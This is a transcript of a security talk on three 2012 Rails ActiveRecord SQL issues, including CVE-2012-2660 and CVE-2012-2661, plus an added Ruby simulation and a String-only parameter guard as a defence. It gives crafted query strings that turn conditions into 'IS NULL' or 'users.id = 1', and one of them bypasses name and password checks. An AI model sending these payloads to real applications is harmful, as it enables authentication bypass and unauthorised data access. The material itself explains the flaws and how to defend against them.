"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week: CVE-2012-2660, CVE-2012-2661

CVE-2012-2660
Allows an unexpected "IS NULL" in queries. Affects Rails 2.x and 3.x.

ActiveRecord query:
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query parameters:
  ?name[]    =>  {"name"=>[nil]}

The nil? check does not catch an array containing nil, so the query runs as:
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys. Affects Rails 3.x.

ActiveRecord query (both forms are affected):
  User.where(:name => params[:name])
  User.where("users.name" => params[:name])

Query parameters:
  ?name[users.id]=1    =>  {"name"=>{"users.id"=>"1"}}

ActiveRecord query as executed:
  User.where(:name => {"users.id" => "1"})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values. Affects Rails 2.3.x and 3.x.

ActiveRecord query:
  User.where(:name => params[:name], :password => params[:password])

Query parameters:
  ?name[users][id]=1&password[users][id]=1
    =>  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord query as executed:
  User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
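All three slides rely on the same chain: the query string is parsed into nested params, the controller's nil? check (or no check at all) lets a non-String value through, and the conditions hash expands into SQL the developer never intended. The following is an added example written for this page, not code from the deck, from Rails or from Rack. It assumes a simplified re-implementation of Rack-style nested parameter parsing (parse_query, assign_nested) and a simplified model of the Rails 3-era conditions expansion (where_fragments, select_sql) that reproduces the three SQL statements above; the String-only check in conditions_guarded is an application-level defence suggested here, not the fix Rails shipped. The three query strings are the constructed inputs.

```ruby
require 'cgi'

# Simplified Rack-style nested query parsing, written for this example (it is
# not Rack's code): "a[]" appends to an array, "a[b][c]" nests hashes, and a
# key without "=" carries a nil value, so "name[]" becomes {"name"=>[nil]}.
def parse_query(query_string)
  params = {}
  query_string.split('&').each do |pair|
    next if pair.empty?
    raw_key, raw_value = pair.split('=', 2)
    key      = CGI.unescape(raw_key)
    value    = raw_value.nil? ? nil : CGI.unescape(raw_value)
    base     = key[/\A[^\[]+/]                     # "name[users][id]" -> "name"
    segments = key.scan(/\[([^\]]*)\]/).flatten    #                  -> ["users", "id"]
    assign_nested(params, base, segments, value)
  end
  params
end

def assign_nested(container, key, segments, value)
  if segments.empty?
    container[key] = value
  elsif segments.first == ''                       # trailing "[]": append to an array
    (container[key] ||= []) << value
  else
    child = (container[key] ||= {})
    assign_nested(child, segments.first, segments.drop(1), value)
  end
end

# Simplified model of how a Rails 3-era conditions hash expands into WHERE
# fragments. This is an assumption written to reproduce the SQL on the slides,
# not ActiveRecord's predicate builder:
#   [nil]                      -> "t"."c" IS NULL
#   "users.id" as a key        -> "users"."id"     (dotted key read as table.column)
#   {"users" => {"id" => "1"}} -> "users"."id" = 1 (nested hash: the key becomes the table)
def quote(value)
  value.to_s =~ /\A\d+\z/ ? value.to_s : "'#{value.to_s.gsub("'", "''")}'"
end

def where_fragments(table, conditions)
  conditions.flat_map do |column, value|
    t, c = table, column.to_s
    t, c = c.split('.', 2) if c.include?('.')
    case value
    when Hash
      where_fragments(c, value)
    when Array
      list = value.map { |v| quote(v) }.join(', ')
      [value == [nil] ? %("#{t}"."#{c}" IS NULL) : %("#{t}"."#{c}" IN (#{list}))]
    else
      [%("#{t}"."#{c}" = #{quote(value)})]
    end
  end
end

def select_sql(table, conditions)
  %(SELECT "#{table}".* FROM "#{table}" WHERE #{where_fragments(table, conditions).join(' AND ')})
end

# The guard from the first slide: only a literal nil skips the lookup, so
# [nil] and the nested hashes go straight into the conditions hash.
def conditions_unguarded(params, keys)
  return nil if keys.any? { |k| params[k].nil? }
  keys.map { |k| [k.to_sym, params[k]] }.to_h
end

# Application-level defence (an added suggestion, not the upstream Rails fix):
# a scalar parameter must be a String, so arrays and hashes never reach the query.
def conditions_guarded(params, keys)
  return nil unless keys.all? { |k| params[k].is_a?(String) }
  keys.map { |k| [k.to_sym, params[k]] }.to_h
end

if __FILE__ == $PROGRAM_NAME
  # Constructed inputs: the three query strings from the slides.
  { 'name[]' => ['name'],
    'name[users.id]=1' => ['name'],
    'name[users][id]=1&password[users][id]=1' => ['name', 'password'] }.each do |qs, keys|
    params = parse_query(qs)
    conds  = conditions_unguarded(params, keys)
    puts "?#{qs}"
    puts "  params:    #{params.inspect}"
    puts "  unguarded: #{conds ? select_sql('users', conds) : 'lookup skipped'}"
    puts "  guarded:   #{conditions_guarded(params, keys) ? 'lookup runs' : 'lookup skipped'}"
  end
end
```

Run with `ruby` on the file. For each of the three query strings the unguarded path prints the slide's SQL, while the String-only guard skips the lookup; a normal `?name=alice` passes both guards and renders `"users"."name" = 'alice'`. The same check also neutralises the second form on the CVE-2012-2661 slide (`"users.name" => params[:name]`), since the dotted key is only dangerous when the value it receives is a hash.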